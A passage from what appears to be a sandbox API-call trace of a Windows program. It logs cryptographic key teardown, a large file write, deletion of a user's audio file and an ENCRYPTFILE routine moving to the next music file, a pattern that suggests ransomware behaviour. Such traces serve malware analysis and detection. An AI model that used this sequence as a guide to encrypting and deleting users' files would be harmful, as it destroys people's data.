CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.324] WriteFile (in: hFile=0x258, lpBuffer=0x49e0d60*, nNumberOfBytesToWrite=0xe2a0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49e0d60*, lpNumberOfBytesWritten=0x144f194*=0xe2a0, lpOverlapped=0x0) returned 1 [0110.326] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0110.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0110.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0110.326] CryptDestroyKey (hKey=0x41ac640) returned 1 [0110.326] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.326] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.327] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0110.327] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0110.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.327] FreeLibrary (hLibModule=0x756e0000) returned 1 [0110.327] CloseHandle (hObject=0x298) returned 1 [0110.327] CloseHandle (hObject=0x258) returned 1 [0110.329] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\fR5QK.wav", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\fR5QK.wav", lpFilePart=0x0) returned 0x1f [0110.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0110.329] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\fR5QK.wav" (normalized: "c:\\users\\fd1hvy\\music\\fr5qk.wav")) returned 0x20 [0110.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0110.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0110.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0110.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0110.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0110.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0110.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0110.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0110.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0110.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0110.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0110.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0110.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0110.330] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\fR5QK.wav", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cde5630, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0xe537d520, ftLastAccessTime.dwHighDateTime=0x1d5e3cd, ftLastWriteTime.dwLowDateTime=0xe537d520, ftLastWriteTime.dwHighDateTime=0x1d5e3cd, nFileSizeHigh=0x0, nFileSizeLow=0xe295, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="fR5QK.wav", cAlternateFileName="")) returned 0x41ac740 [0110.330] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\fR5QK.wav" (normalized: "c:\\users\\fd1hvy\\music\\fr5qk.wav")) returned 1 [0110.371] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cde5630, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0xe537d520, ftLastAccessTime.dwHighDateTime=0x1d5e3cd, ftLastWriteTime.dwLowDateTime=0xe537d520, ftLastWriteTime.dwHighDateTime=0x1d5e3cd, nFileSizeHigh=0x0, nFileSizeLow=0xe295, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="fR5QK.wav", cAlternateFileName="")) returned 0 [0110.372] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0110.372] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0110.372] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0110.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0110.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0110.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0110.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0110.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0110.373] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0110.373] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0110.373] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0110.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0110.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0110.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0110.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9e48 [0110.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0110.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0110.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0110.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0110.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9a10 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0110.374] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0110.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0110.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0110.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.374] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0110.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.374] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40a7170, ftCreationTime.dwHighDateTime=0x1d5e703, ftLastAccessTime.dwLowDateTime=0x84cc6ba0, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x84cc6ba0, ftLastWriteTime.dwHighDateTime=0x1d5edc4, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="gXtG5sqySgJuIPIsH.mp3", cAlternateFileName="GXTG5S~1.MP3")) returned 0x41ac440 [0110.375] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0110.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0110.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0110.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0110.375] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0110.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0110.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0110.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0110.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0110.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0110.376] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0110.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0110.376] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0110.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0110.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0110.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2170 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0110.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0110.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c98 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0110.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0110.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0110.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0110.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | 